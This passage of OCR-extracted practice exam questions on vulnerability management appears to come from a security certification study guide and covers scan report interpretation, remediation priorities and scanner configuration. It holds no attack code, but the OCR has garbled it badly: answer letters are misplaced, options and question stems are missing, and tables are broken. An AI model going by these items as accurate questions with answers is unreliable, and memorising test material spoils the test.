B. Stella should remediate this vulnerability within the next several weeks. 
C. Stella should remediate this vulnerability within the next several months. 


D. Stella does not need to assign any priority to remediating this vulnerability. 


21. What operating system is most likely running on the server in this vulnerability scan 


report? 
A. macOS 
Windows 


B. 
C. CentOS 
D. RHEL 


22. 


23. 


24. 


25. 


26. 
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What is the best way that Stella can correct this vulnerability? 

A. Deploy an intrusion prevention system. 

B. Apply one or more application patches. 

C. Apply one or more operating system patches. 

D. Disable the service. 

Harry is developing a vulnerability scanning program for a large network of sensors used 


by his organization to monitor a transcontinental gas pipeline. What term is commonly 
used to describe this type of sensor network? 


A. WLAN 
B. VPN 

C. P2P 

D. SCADA 


This morning, Eric ran a vulnerability scan in an attempt to detect a vulnerability that was 
announced by a software manufacturer yesterday afternoon. The scanner did not detect 
the vulnerability although Eric knows that at least two of his servers should have the issue. 
Eric contacted the vulnerability scanning vendor who assured him that they released a 
signature for the vulnerability overnight. What should Eric do as a next step? 


A. Check the affected servers to verify a false positive. 

B. Check the affected servers to verify a false negative. 

C. Report a bug to the vendor. 

D. Update the vulnerability signatures. 

Natalie ran a vulnerability scan of a web application recently deployed by her organiza- 
tion, and the scan result reported a blind SQL injection. She reported the vulnerability to 
the developers who scoured the application and made a few modifications but did not see 
any evidence that this attack was possible. Natalie reran the scan and received the same 


result. The developers are now insisting that their code is secure. What is the most likely 
scenario? 


A. The result is a false positive. 

B. The code is deficient and requires correction. 

C. The vulnerability is in a different web application running on the same server. 

D. Natalie is misreading the scan report. 

Frank discovers a missing Windows security patch during a vulnerability scan of a server 


in his organization’s data center. Upon further investigation, he discovers that the system is 
virtualized. Where should he apply the patch? 


A. To the virtualized system 

B. The patch is not necessary 
C. To the domain controller 
D 


To the virtualization platform 
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27. Andrew is frustrated at the high level of false positive reports produced by his vulnerabil- 
ity scans and is contemplating a series of actions designed to reduce the false positive rate. 
Which one of the following actions is least likely to have the desired effect? 


A. Moving to credentialed scanning 
B. Moving to agent-based scanning 
C. Integrating asset information into the scan 
D. Increasing the sensitivity of scans 
28. Joe is conducting a network vulnerability scan against his data center and receives reports 
from system administrators that the scans are slowing down their systems. There are no 


network connectivity issues, only performance problems on individual hosts. He looks at 
the scan settings shown here. Which setting would be most likely to correct the problem? 


Advanced 


General Settings 


¥ Enable safe checks 
Stop scanning hosts that become unresponsive during the scan 
Scan IP addresses in a random order 

Performance Options 
Slow down the scan when network congestion is detected 


Use Linux kernel congestion detection 


Network timeout (in seconds) 5 
Max simultaneous checks per host 5 
Max simultaneous hosts per scan 30 


Max number of concurrent TCP sessions per host 


Max number of concurrent TCP sessions per scan 


Scan IP addresses in a random order 
Network timeout (in seconds) 


Max simultaneous checks per host 
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Max simultaneous hosts per scan 


29. Brenda runs a vulnerability scan of the management interface for her organization’s DNS 
service. She receives the vulnerability report shown here. What should be Brenda’s next 
action? 
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v EE 2 Cookie Does Not Contain The “secure” Attribute port 80/tcp Active [d~] 
First Detected: 08/22/2016 at 20:52:54 (GMT-0400) Last Detected: 08/23/2016 at 05:03:18 (GMT-0400) Times Detected: 2 Last Fixed: N/A 
QID: 150122 
Category: Web Application 
CVE ID: ü 
Vendor Reference 
Bugtraq ID: - 

Service Modified: 06/14/2016 
User Modified: 

Edited: No 

PCI Vuln: Yes 

Ticket State: 

THREAT: 


The cookie does not contain the “secure” attribute. 


Disable the use of cookies on this service. 

Request that the vendor rewrite the interface to avoid this vulnerability. 
Investigate the contents of the cookie. 

Shut down the DNS service. 
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30. Donna is prioritizing vulnerability scans and would like to base the frequency of scanning 
on the information asset value. Which of the following criteria would be most appropriate 
for her to use in this analysis? 


A. Cost of hardware acquisition 
B. Cost of hardware replacement 
C. Types of information processed 
D. Depreciated hardware cost 

31. Laura is working to upgrade her organization’s vulnerability management program. She 
would like to add technology that is capable of retrieving the configurations of systems, 
even when they are highly secured. Many systems use local authentication, and she wants 


to avoid the burden of maintaining accounts on all of those systems. What technology 
should Laura consider to meet her requirement? 


A. Credentialed scanning 
B. Uncredentialed scanning 
C. Server-based scanning 
D. Agent-based scanning 


32. Javier discovered the vulnerability shown here in a system on his network. He is unsure 
what system component is affected. What type of service is causing this vulnerability? 


v EE 2 Microsoft SQL Server Compact 3.5 Service Pack 2 Not Installed 
First Detected: 09/28/2015 at 10:42:15 (GMT-0400) Last Detected: 04/05/2017 at 04:43:21 (GMT-0400) 
QID: 105487 CVSS Base: 9.3) 
Category: Security Policy CVSS Temporal: 6.9 
CVE ID: : CVSS3 Base: - 
Vendor Reference Description of SQL Server Compact 3.5 CVSS3 Temporal: 
Service Pack 2 CVSS Environment: 
Bugtraq ID: - Asset Group: 
Service Modified: 11/04/2015 Collateral Damage Potential: 
User Modified: . Target Distribution: 
Edited: No Confidentiality Requirement: 
PCI Vuln: Yes Integrity Requirement: 


Ticket State: Availability Requirement: 
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33. 
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Backup service 
Database service 


File sharing 
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Web service 


Alicia runs a vulnerability scan of a server being prepared for production and finds the 
vulnerability shown here. Which one of the following actions is least likely to reduce this 
risk? 


M |4 OpenSSH AES-GCM Cipher Remote Code Execution Vulnerability 


QiD: 42420 
Category: General remote services 
CVE ID: CVE-2013-4548 
Vendor Reference: gcmrekey.adv 
Bugtraq ID: 63605 

Service Modified: 06/16/2015 
User Modified: - 

Edited: No 

PCI Vuln: Yes 

Ticket State 

THREAT: 


EE, CE E 


i O O BEN O O O E OU E E E E Mode of Operation 
(GCM) cipher is used for the key exchange. When an AES-GCM cipher is used, the mm_newkeys_from_blob() function in monitor_wrap.c does not 
properly initialize memory for a MAC context data structure, allowing remote authenticated users to bypass intended ForceCommand and login-shell 
restrictions via packet data that provides a crafted callback address. 

The new cipher was added only in OpenSSH 6.2, released on March 22, 2013. 

Affected Software: 

OpenSSH 6.2 and OpenSSH 6.3 when built against an OpenSSL that supports AES-GCM. 


IMPACT: 


A remote authenticated attacker could exploit this vulnerability to execute arbitrary code in the security context of the authenticated user and may 
therefore allow bypassing restricted shell/command configurations. 


SOLUTION: 

Update to OpenSSH 6.4 (http:/Awww.openssh.com/txt/release-6.4) to remediate this vulnerability. 

Workaround: 

Aa workaround, customers may disable AES-GCM in the server configuration. The following sshd_config option will disable AES-GCM while leaving 
other ciphers active: 

— aes 28-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc, blowfish-cbc,casti 28-cbc,aes 192-cbc,aes256-cbc 


Final le Ns CRAG DANAE WY Rit AOE 
OpenSSH 6.4 (http/Avww.openssh.com/txt/release-6.4) 


COMPLIANCE: 
Not Applicable 


EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 


ASSOCIATED MALWARE: 
There is no malware information for this vulnerability. 


RESULTS: 
SSH-2.0-OpenSSH_6.2 detected on port 22 over TCP. 


Block all connections on port 22. 


Upgrade OpenSSH. 
Disable AES-GCM in the server configuration. 
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Install a network IPS in front of the server. 
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34. After scanning his organization’s email server, Frank discovered the vulnerability shown 


here. What is the most effective response that Frank can take in this situation? 


Microsoft Exchange Client Access Server Information Di... 


Description 


The Microsoft Exchange Client Access Server (CAS) is affected by an information disclosure vulnerability. 
A remote, unauthenticated attacker can exploit this vulnerability to learn the server's internal IP address. 


Solution 


There is no known fix at this time. 


See Also 


http://foofus.net/?p=758 


Output 


Nessus was able to verify the issue with the following request : 


GET /autodiscover/autodiscover.xml HTTP/1.0 

Accept-Charset: iso-8859-1,utf£-8;q=0.9,*;q=0.1 

Accept-Language: en 

Connection: Close 

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) 
Pragma: no-cache 

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* 


Which returned the following IP address : 
192.168.0.111 


Port v Hosts 


443 / tcp / www 


Plugin Details 

Severity: Medium 

ID: 77026 

Version: $Revision: 1.2 $ 
Type: remote 

Family: Windows 
Published: 2014/08/06 
Modified: 2015/09/24 


Risk Information 


Risk Factor: Medium 
CVSS Base Score: 5.0 


CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P 
/A:N/A:N 


CVSS Temporal Vector: CVSS2#E:ND/RL:U 
/RC:ND 


CVSS Temporal Score: 5.0 


Vulnerability Information 


CPE: cpe:/a:microsoft:exchange_server 
Exploit Available: true 

Exploit Ease: Exploits are available 
Vulnerability Pub Date: 2014/08/01 
Exploited by Nessus: true 


Reference Information 


BID: 69018 


Upgrade to the most recent version of Microsoft Exchange. 


Upgrade to the most recent version of Microsoft Windows. 


A 
B 
C. Implement the use of strong encryption. 
D. No action is required. 

A 


35. 


Operating system 


A 

B. Web application 
C. Database server 
D 


Firewall 


15 


SQL injection exploit typically gains access to a database by exploiting a vulnerability in 
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Questions 36 through 38 refer to the following scenario: 


Ryan ran a vulnerability scan of one of his organization’s production systems and received 
the report shown here. He would like to understand this vulnerability better and then 
remediate the issue. 


v EEEE 4 Microsoft liS Server XSS Elevation of Privilege Vulnerability (MS17-016) 


First Detected: 04/04/2017 at 21:30:12 (GMT-0400) Last Detected: 04/04/2017 at 21:30:12 (GMT-0400) 
QID: 91339 CVSS Base: 4.3 
Category: Windows CVSS Temporal: 3.2 
CVE ID: CVE-2017-0055 CVSS3 Base: 6.1 
Vendor Reference MSi7-016 CVSS3 Temporal: 5.3 
Bugtraq ID: 96622 CVSS Environment: 

Service Modified: 03/17/2017 Asset Group: 

User Modified: - Collateral Damage Potential: 

Edited: No Target Distribution: 

PCI Vuln: Yes Confidentiality Requirement: 

Ticket State: Open Integrity Requirement: 


Availability Requirement: 


THREAT: 
An elevation of privilege vulnerability exists when Microsoft IIS Server fails to properly sanitize a specially crafted request. 


36. Ryan will not be able to correct the vulnerability for several days. In the meantime, he 
would like to configure his intrusion prevention system to watch for issues related to this 
vulnerability. Which one of the following protocols would an attacker use to exploit this 


vulnerability? 
A. SSH 

B. HTTPS 
C. FTP 

D. RDP 


37. Which one of the following actions could Ryan take to remediate the underlying issue 
without disrupting business activity? 


A. Disable the IIS service. 

B. Apply a security patch. 

C. Modify the web application. 
D. Apply IPS rules. 


38. If an attacker is able to exploit this vulnerability, what is the probable result that will have 
the highest impact on the organization? 


A. Administrative control of the server 
B. Complete control of the domain 

C. Access to configuration information 
D 


Access to web application logs 


39. 


40. 


Chapter 2 = Domain 2: Vulnerability Management 77 


Ted is configuring vulnerability scanning for a file server on his company’s internal net- 
work. The server is positioned on the network as shown here. What types of vulnerabil- 
ity scans should Ted perform to balance the efficiency of scanning effort with expected 
results? 






Database 
Server 


Internet (192.168.0.22) 


\ j File Server 
(192.168.0.16) 


DMZ 





Web Server 
(10.16.25.103/12.6.14.5) 


Ted should not perform scans of servers on the internal network. 


Ted should only perform internal vulnerability scans. 


OWD 


Ted should only perform external vulnerability scans. 
D. Ted should perform both internal and external vulnerability scans. 
Kristen is attempting to determine the next task that she should take on from a list of 


security priorities. Her boss told her that she should focus on activities that have the most 
“bang for the buck.” Of the tasks shown here, which should she tackle first? 


Security Issue (Criticality___|Time Required to Fix 





A. Task 1 
B. Task 2 
C. Task 3 
D. Task 4 
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41. Kevin manages the vulnerability scans for his organization. The senior director that over- 
sees Kevin’s group provides a report to the CIO on a monthly basis on operational activity, 
and he includes the number of open critical vulnerabilities. Kevin would like to provide 
this information to his director in as simple a manner as possible each month. What 
should Kevin do? 


A. Provide the director with access to the scanning system. 
B. Check the system each month for the correct number and email it to the director. 


C. Configure a report that provides the information to automatically send to the direc- 
tor’s email at the proper time each month. 


D. Ask an administrative assistant to check the system and provide the director with the 
information. 


42. Morgan is interpreting the vulnerability scan from her organization’s network, shown 
here. She would like to determine which vulnerability to remediate first. Morgan would 
like to focus on vulnerabilities that are most easily exploitable by someone outside her 
organization. Assuming the firewall is properly configured, which one of the following 
vulnerabilities should Morgan give the highest priority? 


Internet 





\ j File Server 


DMZ 





Email Server Web Server 


Severity 5 vulnerability in the workstation 
Severity 1 vulnerability in the file server 


Severity 5 vulnerability in the web server 
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Severity 1 vulnerability in the mail server 
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43. Mike runs a vulnerability scan against his company’s virtualization environment and finds 
the vulnerability shown here in several of the virtual hosts. What action should Mike take? 


OE HTTP Methods Allowed (per directory) 


A 
ri 


Description 


By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory. 


As this list may be incomplete, the plugin also tests - if ‘Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes' in the 
scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 


403, 405, or 501. 
A. No action is necessary because this is an informational report. 
B. Mike should disable HTTP on the affected devices. 
C. Mike should upgrade the version of OpenSSL on the affected devices. 
D. Mike should immediately upgrade the hypervisor. 


44. Juan recently scanned a system and found that it was running services on ports 139 and 
445. What operating system is this system most likely running? 


A. 
B. 
C. 
D. 


Ubuntu 
macOS 
CentOS 
Windows 


45. Gene is concerned about the theft of sensitive information stored in a database. Which one 
of the following vulnerabilities would pose the most direct threat to this information? 


A. 
B. 
C. 
D. 


SQL injection 
Cross-site scripting 
Buffer overflow 


Denial of service 


46. Which one of the following protocols is not likely to trigger a vulnerability scan alert when 
used to support a virtual private network (VPN)? 


A. 
B. 
C. 
D. 


IPsec 

SSLv2 
PPIP 
SSLv3 


47. Rahul ran a vulnerability scan of a server that will be used for credit card processing in his 
environment and received a report containing the vulnerability shown here. What action 
must Rahul take? 
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Bo 2 Web Server HTTP Trace/Track Method Support Cross-Site Tracing Vulnerability 

First Detected: 02/16/2015 at 12:59:07 (GMT-0400) Last Detected: 04/05/2017 at 05:08:25 (GMT-0400) 
QID: 86473 CVSS Base: 5.8 
Category: Web server CVSS Temporal: 5 
CVE ID: CVE-2004-2320 CVE-2007-3008 CVSS3 Base: e 
Vendor Reference - CVSS3 Temporal: - 
Bugtraq ID: 24456, 9506 CVSS Environment: 

Service Modified: 08/20/2013 Asset Group: - 
User Modified: - Collateral Damage Potential: - 
Edited: No Target Distribution: - 
PCI Vuln: Yes Confidentiality Requirement: - 
Ticket State: Integrity Requirement: - 


Availability Requirement: - 


THREAT: 

A Web server was detected that supports the HTTP TRACE method. This method allows debugging and connection trace 

analysis for connections from the client to the Web server. Per the HTTP specification, when this method is used, the Web 

server echoes back the information sent to it by the client unmodified and unfiltered. Microsoft IIS web server uses an alias TRACK 

for this method, and is functionally the same. 

A vulnerability related to this method was discovered. A malicious, active component in a Web page can send Trace requests 

to a Web server that supports this Trace method. Usually, browser security disallows access to Web sites outside of the present site's domain. 
Although unlikely and difficuk to achieve, it's possible, in the presence of other browser vulnerabilities, for the active HTML content to make 
external requests to arbitrary Web servers beyond the hosting Web server. Since the chosen Web server then echoes back the client 

request unfiltered, the response also includes cookie-based or Web-based (if logged on) authentication credentials that the browser 
automatically sent to the specified Web application on the specified Web server. 

The significance of the Trace capability in this vulnerability is that the active component in the page visited by the victim user has no direct 
access to this authentication information, but gets it after the target Web server echoes it back as its Trace response. 

Since this vulnerability exists as a support for a method required by the HTTP protocol specification, most common Web servers are vulnerable. 
The exact method(s) supported, Trace and/or Track, and their responses are in the Results section below. 

Track / Trace are required to be disabled to be PCI compliance. 


IMPACT: 

If this vulnerability is successfully exploited, users of the Web server may lose their authentication credentials for the server 
and/or for the Web applications hosted by the server to an attacker. This may be the case even if the Web applications are 
not vulnerable to cross site scripting attacks due to input validation errors. 


A. Remediate the vulnerability when possible. 


a 


Remediate the vulnerability prior to moving the system into production and rerun the 
scan to obtain a clean result. 


C. Remediate the vulnerability within 90 days of moving the system to production. 


D. No action is required. 


Questions 48 and 49 refer to the following scenario: 


Aaron is scanning a server in his organization’s data center and receives the vulnerability 
report shown here. The service is exposed only to internal hosts. 


v EE 2 NTP Information Disclosure Vulnerability port 123/udp CVSS: - CVSS3: - Active ($v) 
First Detected: 07/16/2014 at 20:06:22 (GMT-0400) Last Detected: 04/04/2017 at 23:18:46 (GMT-0400) Times Detected: 54 Last Fixed: N/A 
QID: 38293 CVSS Base: 2.6) 

Category: General remote services CVSS Temporal: 2.1 
CVE ID: - CVSS3 Base: = 
Vendor Reference - CVSS3 Temporal: 
Bugtraq ID: - CVSS Environment: 
Service Modified: 06/06/2013 Asset Group: 
User Modified: - Collateral Damage Potential: 
Edited: No Target Distribution: 
PCI Vuln: No Confidentiality Requirement: 
Ticket State: Integrity Requirement: 
Availability Requirement: 
THREAT: 


The NTP service running on the host allows queries of NTP variables. 


IMPACT: 
A remote user can obtain sensitive information about the host by querying various variables. The information obtained can aid in further attacks against the system. 


SOLUTION: 
Please reconfigure NTP to restrict remote access. 
If you require assistance in configuring NTP, please refer to your vendor. For an overview of NTP service access restrictions, please see this NTP access restrictions. 


EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 
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48. What is the normal function of the service with this vulnerability? 
A. File transfer 
B. Web hosting 
C. Time synchronization 


D. Network addressing 


49. What priority should Aaron place on remediating this vulnerability? 
A. Aaron should make this vulnerability his highest priority. 


B. Aaron should remediate this vulnerability urgently but does not need to drop 
everything. 


C. Aaron should remediate this vulnerability within the next month. 
D. Aaron does not need to assign any priority to remediating this vulnerability. 
50. Without access to any additional information, which one of the following vulnerabilities 
would you consider the most severe if discovered on a production web server? 
A. CGI generic SQL injection 
B. Web application information disclosure 
C. Web server uses basic authentication without HTTPS 
D. Web server directory enumeration 
51. Gina ran a vulnerability scan on three systems that her organization is planning to move 


to production and received the results shown here. How many of these issues should Gina 
require be resolved before moving to production? 


v 10.32.q 5 HP iLO 
v Vulnerabilities (5) 9E 
> EEEE 4 RPC Mounted Allows Remote Anonymous File System Root Mount CVSS: - CVSS3:- Fixed +) 
> Baa 3 SSL/TLS use of weak RC4 cipher port 443ncp over SSL CVSS: - CVSS3: - Fixed +) 
> BEB 3 SSL/TLS Server supports TLSv1.0 port 443/tcp over SSL CVSS: - CVSS3: - Fixed +) 
> HE 3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) port 443cp over SSL CVSS: - CVSS3:- Fixed “+ 
> MIM 3 SSLv3.0/TLSv71.0 Protocol Weak CBC Mode Server Side Vulnerability (BEAST) port 443/tcp over SSL CVSS: - CVSS3:- Fixed ~) 
v 10.32." Virtualized Linux Guest 
~ Vulnerabilities (2) HE) 
> BEE 3 SSL/TLS Server supports TLSv1.0 port 50000Ncp over SSL CVSS: - CVSS3:- Fixed -| 
> EEG 3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) port S0000/tcp over SSL CVSS: - CVSS3:- Fixed ~) 
v 10.32.eccq mmnm Soe = -= m Virtualized Linux Guest 
v Vulnerabilities (2) DE 
> EEE 3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) port 50000/%tcp over SSL CVSS: - CVSS3: - Fixed I~) 
> EEG 3 SSL/TLS Server supports TLSv1.0 por S0000/cp over SSL CVSS: - CVSS3:- Fixed Iv) 
A. 0. 
B. 1. 
CG. 3. 
D. All of these issues should be resolved. 
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52. Morgan recently restarted an old vulnerability scanner that had not been used in more 
than a year. She booted the scanner, logged in, and configured a scan to run. After reading 
the scan results, she found that the scanner was not detecting known vulnerabilities that 
were detected by other scanners. What is the most likely cause of this issue? 


A. The scanner is running on an outdated operating system. 
B. The scanner’s maintenance subscription is expired. 

C. Morgan has invalid credentials on the scanner. 

D. The scanner does not have a current, valid IP address. 

53. Carla runs both internal and external vulnerability scans of a web server and detects a 
possible SQL injection vulnerability. The vulnerability only appears in the internal scan 
and does not appear in the external scan. When Carla checks the server logs, she sees the 
requests coming from the internal scan and sees some requests from the external scanner 


but no evidence that a SQL injection exploit was attempted by the external scanner. What 
is the most likely explanation for these results? 


A. A host firewall is blocking external network connections to the web server. 

B. A network firewall is blocking external network connections to the web server. 
C. A host IPS is blocking some requests to the web server. 

D. A network IPS is blocking some requests to the web server. 


54. Rick discovers the vulnerability shown here in a server running in his data center. What 
characteristic of this vulnerability should concern him the most? 


v BBM 4 Microsoft Security Update for Windows Kernel-Mode Drivers (MS17-018) 





First Detected: 04/05/2017 at 01:18:07 (GMT-0400) Last Detected: 04/05/2017 at 01:18:07 (GMT-0400) 
QID: 91342 CVSS Base: 7.2 
Category: Windows CVSS Temporal: 5.3 
CVE ID: CVE-2017-0024 CVE-2017-0026 CVE- CVSS3 Base: 7.8 
2017-0056 CVE-2017-0078 CVE-2017- CVSS3 Temporal: 6.8 
0079 CVE-2017-0080 CVE-2017-0081 CVSS Environment: 
CVE-2017-0082 Asset Group: - 
Vendor Reference MSi7-018 Collateral Damage Potential: - 
Bugtraq ID: 96029, 96032, 96630, 96631, 96632, 96633, 96634, BARRA Distribution: - 
Service Modified: 03/17/2017 Confidentiality Requirement: - 
User Modified: - Integrity Requirement: - 
Edited: No Availability Requirement: - 
PCI Vuln: Yes 
Ticket State: Open 
THREAT: 


Multiple elevation of privilege vulnerabilities exist in Windows when the Windows kemel-mode driver fails to properly handle 
objects in memory. 

The update addresses the vulnerabilities by correcting how the Windows kernel-mode driver handles objects in memory. 
This security update is rated Important for all supported releases of Microsoft Windows. 


IMPACT: 
The vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted 
application that could exploit the vulnerabilities and take control of an affected system 


SOLUTION: 

Customers are advised to refer to MS17-018 for more information. 
Patch: 

Following are links for downloading patches to fix the vulnerabilities: 
MS17-018: Windows 


EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 
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It is the subject of a recent security bulletin. 
It has a CVSS score of 7.2. 
There are multiple Bugtraq and CVE IDs. 


It affects kernel-mode drivers. 


55. Carla is designing a vulnerability scanning workflow and has been tasked with selecting 
the person responsible for remediating vulnerabilities. Which one of the following people 
would normally be in the best position to remediate a server vulnerability? 


A. 
B. 
C. 
D. 


Cybersecurity analyst 
System administrator 
Network engineer 


IT manager 


56. During a recent vulnerability scan, Ed discovered that a web server running on his 
network has access to a database server that should be restricted. Both servers are running 
on his organization’s VMware virtualization platform. Where should Ed look first to 
configure a security control to restrict this access? 


A. 
B. 
C. 
D. 


VMware 
Data center firewall 
Perimeter (Internet) firewall 


Intrusion prevention system 


57. Carl runs a vulnerability scan of a mail server used by his organization and receives the 
vulnerability report shown here. What action should Carl take to correct this issue? 


v BM 4 OpenSSL oracle padding vulnerability(CVE-2016-2107) port 443/tcp over SSL Active {q+} 
First Detected: 08/22/2016 at 20:52:54 (GMT-0400) Last Detected: 08/26/2016 at 05:02:18 (GMT-0400) Times Detected: 5 Last Fixed: N/A 
QID: 38626 
Category: General remote services 


CVE ID: 


CVE-2016-2107 


Vendor Reference OpenSSL Security Advisory 20160503 


Bugtraq ID: 


91787, 89760 


Service Modified: 05/24/2016 
User Modified: 


Edited: 
PCI Vuln: 
Ticket State: 


THREAT: 


No 
No 


The OpenSSL Project is an Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS) protocols as well as a general purpose 
cryptography library. 

OpenSSL contains the following vulnerability: 

A MITM attacker can use a padding oracle attack to decrypt traffic when the connection uses an AES CBC cipher and the server support AES-NI. Affected Versions: 

OpenSSL 1.0.2 prior to OpenSSL 1.0.2h OpenSSL 1.0.1 prior to OpenSSL 1.0.1t 
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Carl does not need to take any action because this is an informational report. 
Carl should replace SSL with TLS on this server. 

Carl should disable weak ciphers. 

Carl should upgrade OpenSSL. 
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58. Renee is configuring a vulnerability scanner that will run scans of her network. Corporate 
policy requires the use of daily vulnerability scans. What would be the best time to 
configure the scans? 


A. During the day when operations reach their peak to stress test systems 
B. During the evening when operations are minimal to reduce the impact on systems 


C. During lunch hour when people have stepped away from their systems but there is still 
considerable load 


D. On the weekends when the scans may run unimpeded 
59. Ahmed is reviewing the vulnerability scan report from his organization’s central storage 


service and finds the results shown here. Which action can Ahmed take that will be effec- 
tive in remediating the highest-severity issue possible? 


v b mem bees eee eee M a NetApp Release 8.1.4P3 7-Mode 


w Vulnerabilities (22) E 








> EEEEN 5 EOL/Obsolete Software: SNMP Version Detected CVSS: - CVSS3: - Active 
> EEEH 3 NetBIOS Shared Folder List Available CVSS: - CVSS3: - Active [$~] 
> HE 3 NFS Exported Filesystems List Vulnerability CVSS: - CVSS3: - Active ~) 
> EEE 3 SSL Server Has SSLv3 Enabled Vulnerability port 443/tcp over SSL CVSS: - CVSS3: - Active +) 
>» BEG 3 SSL Server Has SSLv2 Enabled Vulnerability port 443/tcp over SSL CVSS: - CVSS3:- Active 
> BE 3 SSL/TLS use of weak RC4 cipher port 443/tcp over SSL CVSS: - CVSS3:- Active [q+ 
> Baa 3 Readable SNMP Information port 161/udp CVSS: - CVSS3:- Active +) 
> Ba 2 NetBIOS Name Accessible CVSS: - CVSS3:- Active ($7) 
> a 2 Hidden RPC Services CVSS: - CVSS3:- Active ($v) 
> a 2 YPINIS RPC Services Listening on Non-Privileged Ports CVSS: - CVSS3: - Active ($~) 
> Ba 2 Default Windows Administrator Account Name Present CVSS: - CVSS3: - Active 
> Ba 2 SSL Certificate - Server Public Key Too Small port 443/tcp over SSL CVSS: - CVSS3:- Active +) 
> Ba 2 SSL Certificate - Self-Signed Certificate port 443/tcp over SSL CVSS: - CVSS3:- Active 
> Ba 2 SSL Certificate - Subject Common Name Does Not Match Server FQDN port 443/tcp over SSL CVSS: - CVSS3: - Active 
> Ba 2 SSL Certificate - Signature Verification Failed Vulnerability port 443/tcp over SSL CVSS: - CVSS3: - Active +) 
> Ba 2 SSL Certificate - Improper Usage Vulnerability port 443/tcp over SSL CVSS: - CVSS3:- Active +) 
> Ba 2 NTP Information Disclosure Vulnerability port 123/udp CVSS: - CVSS3: - Active +) 
> 1 Non-Zero Padding Bytes Observed in Ethernet Packets CVSS: - CVSS3:- Active +) 
> 1 mountd RPC Daemon Discloses Exported Directories Accessed by Remote Hosts CVSS: - CVSS3: - Active +7) 
> 1 “rquotad” RPC Service Present CVSS: - CVSS3:- Active ~) 
>E 1 Presence of a Load-Balancing Device Detected port 80/tcp CVSS: - CVSS3: - Active 
>E 1 Presence of a Load-Balancing Device Detected port 443/tcp over SSL CVSS: - CVSS3: - Re-Opened [$~] 

A. Upgrade to SNMPv3. 

B. Disable the use of RC4. 

C. Replace the use of SSL with TLS. 


D. Disable remote share enumeration. 


Questions 60 and 61 refer to the following scenario: 


Glenda ran a vulnerability scan of workstations in her organization. She noticed that 
many of the workstations reported the vulnerability shown here. She would like to not 
only correct this issue but also prevent the likelihood of similar issues occurring in the 
future: 


Chapter 2 = Domain 2: Vulnerability Management 


v BBM 4 Google Chrome Prior to 57.0.2987.133 Multiple Vulnerabilities 


First Detected: 04/05/2017 at 03:39:44 (GMT-0400) Last Detected: 04/05/2017 at 03:39:44 (GMT-0400) 
QID: 370356 CVSS Base: 9.3 
Category: Local CVSS Temporal: 6.9 
CVE ID: CVE-2017-5054 CVE-2017-5052 CVE- CVSS3 Base: - 
2017-5056 CVE-2017-5053 CVE-2017- CVSS3 Temporal: - 
5055 CVSS Environment: 
Vendor Reference Google Chrome Asset Group: . 
Bugtraq ID: - Collateral Damage Potential: - 
Service Modified: 04/09/2017 Target Distribution: - 
User Modified: - Confidentiality Requirement: - 
Edited: No Integrity Requirement: - 
PCI Vuln: Yes Availability Requirement: - 
Ticket State: Open 
THREAT: 


Google Chrome is a web browser for multiple platforms developed by Google. 
This Google Chrome update fixes the following vulnerabilities: 
CVE-2017-5054: Heap buffer overflow in V8. 

CVE-2017-5052: Bad cast in Blink. 

CVE-2017-5056: Use after free in Blink. 

CVE-2017-5053: Out of bounds memory access in V8. 

CVE-2017-5055: Use after free in printing. 


IMPACT: 


A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive 
information when visited by the victim. 


SOLUTION: 
Customers are advised to upgrade to Google Chrome 57.0.2987.133 or a later version. 
Patch: 


Following are links for downloading patches to fix the vulnerabilities: 
le Chrome: Windows 
Google Chrome: MAC OS X 


EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 


60. What action should Glenda take to achieve her goals? 


61. 


A. 


B. 
C. 
D. 


Glenda should uninstall Chrome from all workstations and replace it with Internet 
Explorer. 


Glenda should manually upgrade Chrome on all workstations. 
Glenda should configure all workstations to automatically update Chrome. 


Glenda does not need to take any action. 


What priority should Glenda place on remediating this vulnerability? 


A. 
B. 


Glenda should make this vulnerability her highest priority. 


Glenda should remediate this vulnerability urgently but does not need to drop 
everything. 


Glenda should remediate this vulnerability within the next several months. 


Glenda does not need to assign any priority to remediating this vulnerability. 
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62. After reviewing the results of a vulnerability scan, Beth discovered a flaw in her Oracle 
database server that may allow an attacker to attempt a direct connection to the server. 
She would like to review netflow logs to determine what systems have connected to the 
server recently. What TCP port should Beth expect to find used for this communication? 


A. 443 

B. 1433 
C. 1521 
D. 8080 


63. Greg runs a vulnerability scan of a server in his organization and finds the results shown 
here. What is the most likely explanation for these results? 


OOH TTP Server Type and Version Plugin Details 
' Severity: Info 

Description 
ID: 10107 

This plugin attempts to determine the type and the version of the remote web server. Version: $Revision: 1.120 $ 
Type: remote 

Output Family: Web Servers 
Published: 2000/01/04 

The remote web server type is : pi 

Modified: 2014/08/01 


Microsoft-IIS/6.0 


Port ¥ Hosts Risk Information 
80 / tcp / www 

Risk Factor: None 
443 / tcp / www 


2025 / tcp / www 
2026 / tcp / www 
2027 / tcp / www 
2028 / tcp / www 
2029 / tcp / www 
2030 / tcp / www 
2031 / tcp / www 
2032 / tcp / www 
2033 / tcp / www 
2034 / tcp / www 


2035 / tcp / www 


The organization is running web services on nonstandard ports. 


The scanner is providing a false positive error report. 
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The web server has mirrored ports available. 


D. The server has been compromised by an attacker. 


64. Jim is reviewing a vulnerability scan of his organization’s VPN appliance. He wants to 
remove support for any insecure ciphers from the device. Which one of the following 
ciphers should he remove? 


A. ECDHE-RSA-AES128-SHA256 
B. AES256-SHA256 


65. 


66. 


67. 
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C. DHE-RSA-AES256-GCM-SHA384 
D. EDH-RSA-DES-CBC3-SHA 


Terry recently ran a vulnerability scan against his organization’s credit card processing 
